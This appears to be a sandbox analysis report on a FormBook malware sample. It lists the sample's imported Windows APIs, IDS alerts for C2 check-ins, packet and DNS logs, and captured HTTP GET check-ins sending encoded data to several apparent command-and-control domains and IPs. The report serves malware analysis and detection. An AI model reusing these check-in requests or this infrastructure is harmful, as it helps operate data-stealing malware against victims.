WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T21:37:35.428981+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49165	80	192.168.2.22	162.241.203.16
2024-07-25T21:38:15.656881+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49166	80	192.168.2.22	91.195.240.19
2024-07-25T21:35:13.954846+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49163	80	192.168.2.22	65.21.196.90
2024-07-25T21:36:12.789655+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49162	80	192.168.2.22	192.185.209.182
2024-07-25T21:35:53.734316+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49161	80	192.168.2.22	185.107.56.60
2024-07-25T21:39:17.815301+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49168	80	192.168.2.22	213.186.33.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 21:35:53.091727972 CEST	49161	80	192.168.2.22	185.107.56.60
Jul 25, 2024 21:35:53.100817919 CEST	80	49161	185.107.56.60	192.168.2.22
Jul 25, 2024 21:35:53.100898027 CEST	49161	80	192.168.2.22	185.107.56.60
Jul 25, 2024 21:35:53.102555990 CEST	49161	80	192.168.2.22	185.107.56.60
Jul 25, 2024 21:35:53.110761881 CEST	80	49161	185.107.56.60	192.168.2.22
Jul 25, 2024 21:35:53.730438948 CEST	80	49161	185.107.56.60	192.168.2.22
Jul 25, 2024 21:35:53.730597973 CEST	80	49161	185.107.56.60	192.168.2.22
Jul 25, 2024 21:35:53.730649948 CEST	49161	80	192.168.2.22	185.107.56.60
Jul 25, 2024 21:35:53.734316111 CEST	49161	80	192.168.2.22	185.107.56.60
Jul 25, 2024 21:35:53.735492945 CEST	80	49161	185.107.56.60	192.168.2.22
Jul 25, 2024 21:36:11.922883034 CEST	49162	80	192.168.2.22	192.185.209.182
Jul 25, 2024 21:36:11.928061008 CEST	80	49162	192.185.209.182	192.168.2.22
Jul 25, 2024 21:36:11.928144932 CEST	49162	80	192.168.2.22	192.185.209.182
Jul 25, 2024 21:36:11.928165913 CEST	49162	80	192.168.2.22	192.185.209.182
Jul 25, 2024 21:36:11.941687107 CEST	80	49162	192.185.209.182	192.168.2.22
Jul 25, 2024 21:36:12.774386883 CEST	80	49162	192.185.209.182	192.168.2.22
Jul 25, 2024 21:36:12.774584055 CEST	49162	80	192.168.2.22	192.185.209.182
Jul 25, 2024 21:36:12.789602041 CEST	80	49162	192.185.209.182	192.168.2.22
Jul 25, 2024 21:36:12.789654970 CEST	49162	80	192.168.2.22	192.185.209.182
Jul 25, 2024 21:36:12.789663076 CEST	80	49162	192.185.209.182	192.168.2.22
Jul 25, 2024 21:36:32.078866005 CEST	49163	80	192.168.2.22	65.21.196.90
Jul 25, 2024 21:36:32.086280107 CEST	80	49163	65.21.196.90	192.168.2.22
Jul 25, 2024 21:36:32.086422920 CEST	49163	80	192.168.2.22	65.21.196.90
Jul 25, 2024 21:36:32.086422920 CEST	49163	80	192.168.2.22	65.21.196.90
Jul 25, 2024 21:36:32.091264009 CEST	80	49163	65.21.196.90	192.168.2.22
Jul 25, 2024 21:36:32.783348083 CEST	80	49163	65.21.196.90	192.168.2.22
Jul 25, 2024 21:36:32.783368111 CEST	80	49163	65.21.196.90	192.168.2.22
Jul 25, 2024 21:36:32.783548117 CEST	49163	80	192.168.2.22	65.21.196.90
Jul 25, 2024 21:36:32.783548117 CEST	49163	80	192.168.2.22	65.21.196.90
Jul 25, 2024 21:36:32.790713072 CEST	80	49163	65.21.196.90	192.168.2.22
Jul 25, 2024 21:37:12.848299026 CEST	49164	80	192.168.2.22	84.32.84.32
Jul 25, 2024 21:37:12.860188961 CEST	80	49164	84.32.84.32	192.168.2.22
Jul 25, 2024 21:37:12.860246897 CEST	49164	80	192.168.2.22	84.32.84.32
Jul 25, 2024 21:37:12.860311031 CEST	49164	80	192.168.2.22	84.32.84.32
Jul 25, 2024 21:37:12.865058899 CEST	80	49164	84.32.84.32	192.168.2.22
Jul 25, 2024 21:37:13.384753942 CEST	80	49164	84.32.84.32	192.168.2.22
Jul 25, 2024 21:37:13.385488987 CEST	80	49164	84.32.84.32	192.168.2.22
Jul 25, 2024 21:37:13.385503054 CEST	80	49164	84.32.84.32	192.168.2.22
Jul 25, 2024 21:37:13.385541916 CEST	49164	80	192.168.2.22	84.32.84.32
Jul 25, 2024 21:37:13.388696909 CEST	80	49164	84.32.84.32	192.168.2.22
Jul 25, 2024 21:37:13.388710022 CEST	80	49164	84.32.84.32	192.168.2.22
Jul 25, 2024 21:37:13.388731956 CEST	49164	80	192.168.2.22	84.32.84.32
Jul 25, 2024 21:37:13.388796091 CEST	49164	80	192.168.2.22	84.32.84.32
Jul 25, 2024 21:37:13.392180920 CEST	80	49164	84.32.84.32	192.168.2.22
Jul 25, 2024 21:37:13.392194986 CEST	80	49164	84.32.84.32	192.168.2.22
Jul 25, 2024 21:37:13.392241001 CEST	49164	80	192.168.2.22	84.32.84.32
Jul 25, 2024 21:37:13.392267942 CEST	49164	80	192.168.2.22	84.32.84.32
Jul 25, 2024 21:37:13.395680904 CEST	80	49164	84.32.84.32	192.168.2.22
Jul 25, 2024 21:37:13.395697117 CEST	80	49164	84.32.84.32	192.168.2.22
Jul 25, 2024 21:37:13.395709991 CEST	80	49164	84.32.84.32	192.168.2.22
Jul 25, 2024 21:37:13.395735025 CEST	49164	80	192.168.2.22	84.32.84.32
Jul 25, 2024 21:37:13.395765066 CEST	49164	80	192.168.2.22	84.32.84.32
Jul 25, 2024 21:37:13.395765066 CEST	49164	80	192.168.2.22	84.32.84.32
Jul 25, 2024 21:37:13.397377014 CEST	80	49164	84.32.84.32	192.168.2.22
Jul 25, 2024 21:37:13.397546053 CEST	49164	80	192.168.2.22	84.32.84.32
Jul 25, 2024 21:37:34.484771967 CEST	49165	80	192.168.2.22	162.241.203.16
Jul 25, 2024 21:37:34.489676952 CEST	80	49165	162.241.203.16	192.168.2.22
Jul 25, 2024 21:37:34.489780903 CEST	49165	80	192.168.2.22	162.241.203.16
Jul 25, 2024 21:37:34.489799023 CEST	49165	80	192.168.2.22	162.241.203.16
Jul 25, 2024 21:37:34.494662046 CEST	80	49165	162.241.203.16	192.168.2.22
Jul 25, 2024 21:37:35.428119898 CEST	80	49165	162.241.203.16	192.168.2.22
Jul 25, 2024 21:37:35.428163052 CEST	80	49165	162.241.203.16	192.168.2.22
Jul 25, 2024 21:37:35.428174019 CEST	80	49165	162.241.203.16	192.168.2.22
Jul 25, 2024 21:37:35.428247929 CEST	49165	80	192.168.2.22	162.241.203.16
Jul 25, 2024 21:37:35.428247929 CEST	49165	80	192.168.2.22	162.241.203.16
Jul 25, 2024 21:37:35.428910971 CEST	80	49165	162.241.203.16	192.168.2.22
Jul 25, 2024 21:37:35.428981066 CEST	49165	80	192.168.2.22	162.241.203.16
Jul 25, 2024 21:37:35.433140039 CEST	80	49165	162.241.203.16	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 21:35:52.878762960 CEST	54562	53	192.168.2.22	8.8.8.8
Jul 25, 2024 21:35:52.886395931 CEST	53	54562	8.8.8.8	192.168.2.22
Jul 25, 2024 21:36:11.743940115 CEST	52917	53	192.168.2.22	8.8.8.8
Jul 25, 2024 21:36:11.922291040 CEST	53	52917	8.8.8.8	192.168.2.22
Jul 25, 2024 21:36:32.070180893 CEST	62751	53	192.168.2.22	8.8.8.8
Jul 25, 2024 21:36:32.078269958 CEST	53	62751	8.8.8.8	192.168.2.22
Jul 25, 2024 21:36:52.255606890 CEST	57893	53	192.168.2.22	8.8.8.8
Jul 25, 2024 21:36:52.597269058 CEST	53	57893	8.8.8.8	192.168.2.22
Jul 25, 2024 21:37:12.821440935 CEST	54821	53	192.168.2.22	8.8.8.8
Jul 25, 2024 21:37:12.847757101 CEST	53	54821	8.8.8.8	192.168.2.22
Jul 25, 2024 21:37:34.265697956 CEST	54719	53	192.168.2.22	8.8.8.8
Jul 25, 2024 21:37:34.484255075 CEST	53	54719	8.8.8.8	192.168.2.22
Jul 25, 2024 21:37:55.543709993 CEST	49881	53	192.168.2.22	8.8.8.8
Jul 25, 2024 21:37:55.554471016 CEST	53	49881	8.8.8.8	192.168.2.22
Jul 25, 2024 21:38:14.904202938 CEST	54998	53	192.168.2.22	8.8.8.8
Jul 25, 2024 21:38:14.913043022 CEST	53	54998	8.8.8.8	192.168.2.22
Jul 25, 2024 21:38:35.995373011 CEST	52781	53	192.168.2.22	8.8.8.8
Jul 25, 2024 21:38:36.044966936 CEST	53	52781	8.8.8.8	192.168.2.22
Jul 25, 2024 21:38:56.040499926 CEST	63926	53	192.168.2.22	8.8.8.8
Jul 25, 2024 21:38:56.051973104 CEST	53	63926	8.8.8.8	192.168.2.22
Jul 25, 2024 21:39:17.122400045 CEST	65510	53	192.168.2.22	8.8.8.8
Jul 25, 2024 21:39:17.161263943 CEST	53	65510	8.8.8.8	192.168.2.22
Jul 25, 2024 21:39:36.299529076 CEST	62672	53	192.168.2.22	8.8.8.8
Jul 25, 2024 21:39:36.922400951 CEST	53	62672	8.8.8.8	192.168.2.22
Jul 25, 2024 21:39:57.328680992 CEST	56475	53	192.168.2.22	8.8.8.8
Jul 25, 2024 21:39:57.351820946 CEST	53	56475	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 21:35:52.878762960 CEST	192.168.2.22	8.8.8.8	0x622a	Standard query (0)	www.thepowerofzeus.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:36:11.743940115 CEST	192.168.2.22	8.8.8.8	0xa59f	Standard query (0)	www.alivioquantico.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:36:32.070180893 CEST	192.168.2.22	8.8.8.8	0x575c	Standard query (0)	www.00050591.xyz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:36:52.255606890 CEST	192.168.2.22	8.8.8.8	0xebec	Standard query (0)	www.kjsdhklssk73.xyz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:37:12.821440935 CEST	192.168.2.22	8.8.8.8	0x15a2	Standard query (0)	www.arthemis-168bet.site	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:37:34.265697956 CEST	192.168.2.22	8.8.8.8	0xc2c0	Standard query (0)	www.ilovetvs.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:37:55.543709993 CEST	192.168.2.22	8.8.8.8	0xb8e	Standard query (0)	www.bougeefilth.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:38:14.904202938 CEST	192.168.2.22	8.8.8.8	0xe8fb	Standard query (0)	www.uhug.xyz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:38:35.995373011 CEST	192.168.2.22	8.8.8.8	0xf219	Standard query (0)	www.crucka.xyz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:38:56.040499926 CEST	192.168.2.22	8.8.8.8	0x8979	Standard query (0)	www.freyja.info	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:39:17.122400045 CEST	192.168.2.22	8.8.8.8	0x38c8	Standard query (0)	www.batremake.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:39:36.299529076 CEST	192.168.2.22	8.8.8.8	0xa945	Standard query (0)	www.gbqspj.club	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:39:57.328680992 CEST	192.168.2.22	8.8.8.8	0x718e	Standard query (0)	www.mantapnagita777.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 21:35:52.886395931 CEST	8.8.8.8	192.168.2.22	0x622a	No error (0)	www.thepowerofzeus.com		185.107.56.60	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:36:11.922291040 CEST	8.8.8.8	192.168.2.22	0xa59f	No error (0)	www.alivioquantico.com	alivioquantico.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 21:36:11.922291040 CEST	8.8.8.8	192.168.2.22	0xa59f	No error (0)	alivioquantico.com		192.185.209.182	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:36:32.078269958 CEST	8.8.8.8	192.168.2.22	0x575c	No error (0)	www.00050591.xyz	00050591.xyz		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 21:36:32.078269958 CEST	8.8.8.8	192.168.2.22	0x575c	No error (0)	00050591.xyz		65.21.196.90	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:37:12.847757101 CEST	8.8.8.8	192.168.2.22	0x15a2	No error (0)	www.arthemis-168bet.site	arthemis-168bet.site		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 21:37:12.847757101 CEST	8.8.8.8	192.168.2.22	0x15a2	No error (0)	arthemis-168bet.site		84.32.84.32	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:37:34.484255075 CEST	8.8.8.8	192.168.2.22	0xc2c0	No error (0)	www.ilovetvs.com	ilovetvs.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 21:37:34.484255075 CEST	8.8.8.8	192.168.2.22	0xc2c0	No error (0)	ilovetvs.com		162.241.203.16	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:37:55.554471016 CEST	8.8.8.8	192.168.2.22	0xb8e	Name error (3)	www.bougeefilth.com	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:38:14.913043022 CEST	8.8.8.8	192.168.2.22	0xe8fb	No error (0)	www.uhug.xyz	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 21:38:14.913043022 CEST	8.8.8.8	192.168.2.22	0xe8fb	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:38:36.044966936 CEST	8.8.8.8	192.168.2.22	0xf219	Name error (3)	www.crucka.xyz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:38:56.051973104 CEST	8.8.8.8	192.168.2.22	0x8979	No error (0)	www.freyja.info		76.223.54.146	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:38:56.051973104 CEST	8.8.8.8	192.168.2.22	0x8979	No error (0)	www.freyja.info		13.248.169.48	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:39:17.161263943 CEST	8.8.8.8	192.168.2.22	0x38c8	No error (0)	www.batremake.com		213.186.33.5	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:39:57.351820946 CEST	8.8.8.8	192.168.2.22	0x718e	No error (0)	www.mantapnagita777.com		104.21.91.94	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:39:57.351820946 CEST	8.8.8.8	192.168.2.22	0x718e	No error (0)	www.mantapnagita777.com		172.67.214.234	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.thepowerofzeus.com

www.alivioquantico.com

www.00050591.xyz

www.arthemis-168bet.site

www.ilovetvs.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	185.107.56.60	80	1244	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 21:35:53.102555990 CEST	176	OUT	GET /jd21/?tBZLfTtx=28cPGcaENb280W65HmbHU6pQLIPuemsbyE+toeghGUICUOM9gHK+zZW7s47qkPel79A7Dw==&oHEpRr=M2JpdRJ HTTP/1.1 Host: www.thepowerofzeus.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 25, 2024 21:35:53.730438948 CEST	371	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Thu, 25 Jul 2024 19:35:53 GMT location: http://survey-smiles.com server: nginx set-cookie: sid=1b23a0db-4abd-11ef-9f5b-e4c252633047; path=/; domain=.thepowerofzeus.com; expires=Tue, 12 Aug 2092 22:50:00 GMT; max-age=2147483647; HttpOnly Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49162	192.185.209.182	80	1244	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 21:36:11.928165913 CEST	176	OUT	GET /jd21/?tBZLfTtx=LcHXUWoW2sdPa4UFpuGqq/go6wrzpC/UeDgbPZxccUPKb44TjfXPeWdmbH3xVj13RIFx0w==&oHEpRr=M2JpdRJ HTTP/1.1 Host: www.alivioquantico.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 25, 2024 21:36:12.774386883 CEST	450	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 25 Jul 2024 19:36:12 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: http://alivioquantico.com/jd21/?tBZLfTtx=LcHXUWoW2sdPa4UFpuGqq/go6wrzpC/UeDgbPZxccUPKb44TjfXPeWdmbH3xVj13RIFx0w==&oHEpRr=M2JpdRJ Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49163	65.21.196.90	80	1244	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 21:36:32.086422920 CEST	170	OUT	GET /jd21/?tBZLfTtx=+5nsDbzeImt5UbX4GDv04YNxDKhKydlr4q6vzHl7qi3uGOgXSU0vDET8vanb4niZtoheVA==&oHEpRr=M2JpdRJ HTTP/1.1 Host: www.00050591.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 25, 2024 21:36:32.783348083 CEST	1032	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Thu, 25 Jul 2024 19:36:32 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this 